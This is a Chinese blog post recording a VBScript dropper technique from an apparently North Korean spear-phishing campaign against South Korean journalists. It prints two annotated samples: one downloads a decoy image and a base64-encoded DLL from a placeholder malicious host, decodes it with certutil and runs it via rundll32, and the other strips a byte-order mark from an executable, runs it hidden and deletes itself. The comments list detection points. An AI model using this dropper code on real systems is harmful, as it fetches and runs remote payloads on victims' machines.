  • 利用VBS下载EXE文件手法记录

    1、信息来源

    疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

    https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

    https://twitter.com/blackorbird/status/1082553543280680962

    2、利用思路

    1、 下载 http://恶意网址/note[.]png 保存到 %TEMP% 目录下，再通过【powershell Invoke-Item】以默认关联程序打开（脚本本身并不执行该 PNG，推测为诱饵文件）。
    2、 下载 http://恶意网址/svchow.dat 同样保存到 %TEMP% 目录下（svchow[.]dat 为 base64 编码的 DLL）。
    3、 用 certutil -f -decode 对 svchow.dat 做 base64 解码并输出为 svchow.dll，-f 强制覆盖已存在的文件（certutil -decode 是典型的 LOLBin 手法，也是现成的检测点）。
    4、 通过 powershell 调用 rundll32 加载 svchow.dll 并调用其导出函数 MyRTLCreateFunction，真正的恶意代码在此执行。

    3、实例代码

    下载代码:

    ' Stage-1 VBS dropper (archived sample, annotated for analysis only; do not run).
    ' Flow as written: (1) GET note.png and save it under %TEMP%, (2) open it via
    ' "powershell Invoke-Item", (3) GET svchow.dat under %TEMP%, (4) base64-decode
    ' it with certutil into svchow.dll, (5) call the DLL's MyRTLCreateFunction
    ' export through rundll32. Every Run call below uses window style 0 (hidden)
    ' and waits for the child to exit (bWaitOnReturn = True).
    ' Detection hooks visible in this script: wscript/cscript spawning
    ' powershell.exe, certutil.exe -decode writing a DLL under %TEMP%, and
    ' rundll32.exe loading a DLL from %TEMP% with a named export.
    ' Note: VBScript strings have no backslash escapes; the "\n" sequences in the
    ' sample's "\note.png" were turned into real line breaks by the blog engine,
    ' which is why two string literals below appear split across lines.
    Set wshShell = CreateObject("Wscript.shell")
    ' %TEMP% expanded via WScript.Shell; every dropped file lands in this directory.
    dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
    ' "恶意网址" is the author's placeholder for the malicious host. Plain http,
    ' no TLS and no integrity check on the response body.
    docUrl = "http://恶意网址/note.png"
    ' Synchronous (False) GET via the legacy MSXML object; responseBody is raw bytes.
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", docUrl, False
    xHttp.Send
    ' NOTE(review): the line break inside this literal is rendering damage -- the
    ' sample's "\note.png" lost its backslash, leaving "ote.png" on the next line.
    ' The intended path is %TEMP%\note.png.
    docPath = dir + "
    ote.png"
    with bStrm
    	.type = 1 ' adTypeBinary: write the raw bytes, not text
    	.open
    	.write xHttp.responseBody
    	.savetofile docPath, 2 ' adSaveCreateOverWrite: clobber any existing file
    end With
    
    ' Invoke-Item opens note.png with its default handler (an image viewer for a
    ' .png), i.e. the file is displayed to the user; nothing in this script
    ' executes the PNG itself, so it is presumably a decoy. Same "\n" rendering
    ' damage as above in the split literal.
    CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "
    ote.png'", 0, true
    
    ' Second payload: svchow.dat, fetched the same way. Per the author's notes it
    ' is a base64-encoded DLL, decoded by certutil below.
    docUrl = "http://恶意网址/svchow.dat"
    dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
    dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
    xHttp2.Open "GET", docUrl, False
    xHttp2.Send
    
    with bStrm2
    	.type = 1 ' adTypeBinary
    	.open
    	.write xHttp2.responseBody
    	' NOTE(review): no path separator between dir and "svchow.dat" in this copy;
    	' likely a backslash lost to the same rendering damage -- TODO confirm
    	' against the original sample.
    	.savetofile dir + "svchow.dat", 2 ' adSaveCreateOverWrite
    end With
    ' certutil -f -decode <in> <out>: base64-decodes svchow.dat into svchow.dll,
    ' -f forcing overwrite, launched through a hidden PowerShell window. The comma
    ' between the two paths is presumably expanded by PowerShell into two separate
    ' arguments -- TODO confirm. certutil -decode is a classic LOLBin indicator.
    CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "svchow.dat, " & dir & "svchow.dll",0,true
    ' rundll32 <dll>,<export>: loads svchow.dll from %TEMP% and calls its
    ' MyRTLCreateFunction export -- this is where the actual payload runs.
    CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "svchow.dll,MyRTLCreateFunction",0,true
    
    
    

    去除文件头 BOM 后运行 exe（脚本随后自删除）:

    ' Second technique from the post: strip a 2-byte byte-order mark from a file
    ' dropped as C:\windows\temp\xxx.exe, run it with a hidden window, then
    ' delete the running script. Archived sample, annotated for analysis only.
    ' The paths below lost their backslashes in the blog's rendering ("\t" became
    ' a real TAB, the other backslashes were dropped); read them as
    ' "C:\windows\temp\xxx.exe".
    Dim fIn, fOut, sFilename, sBOM
    ' NOTE(review): this literal contains a real TAB character between "windows"
    ' and "emp" -- rendering damage, not part of the sample's path.
    sFilename = "C:windows	empxxx.exe"
    
    Set fIn = CreateObject("adodb.stream")
    fIn.Type = 1 'adTypeBinary
    ' NOTE(review): adModeRead (and adModeReadWrite below) are ADO enum names that
    ' bare VBScript does not define; with no Option Explicit an undeclared name
    ' evaluates to Empty here -- TODO confirm whether the sample relied on the
    ' default mode or had a typelib reference.
    fIn.Mode = adModeRead
    fIn.Open
    fIn.LoadFromFile sFilename
    
    ' Reads 5 bytes, but only the first two are inspected below.
    sBOM = fIn.Read(5)
    ' The check is for 0xFF,0xFE (decimal 255, 254), the UTF-16 LE byte-order
    ' mark -- NOT the UTF-8 BOM (0xEF,0xBB,0xBF) the original comment named.
    ' NOTE(review): presumably the payload was staged with this 2-byte prefix so
    ' the file on disk does not start with an "MZ" header until the script strips
    ' it; that cannot be verified from the script alone.
    If AscB(MidB(sBOM, 1, 1)) = 255 _
            And AscB(MidB(sBOM, 2, 1)) = 254 Then
        
        fIn.Position = 2 ' Skip the 2-byte BOM; everything after it is copied
    
        Set fOut = CreateObject("adodb.stream")
        fOut.Type = 1 'adTypeBinary
        fOut.Mode = adModeReadWrite
        fOut.Open
    
        fIn.CopyTo fOut
    
        ' Rewrite the file in place without the BOM.
        fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
        fOut.Flush
        fOut.Close
    
    	' Hidden window (0), do not wait (False): the script proceeds straight to
    	' self-deletion while the dropped executable keeps running.
    	Set shell = CreateObject("Wscript.Shell")
    	shell.Run "c:windows	empxxx.exe",0,False
    	
    	' Self-deletion (anti-forensics). WScript.ScriptName is the bare file name,
    	' so this resolves against the current working directory rather than the
    	' script's own directory -- ScriptFullName would have been the robust choice.
    	Set fso = CreateObject("Scripting.FileSystemObject") 
    	fso.DeleteFile(WScript.ScriptName) 
    End If
    
  • 原文地址:https://www.cnblogs.com/17bdw/p/10181580.html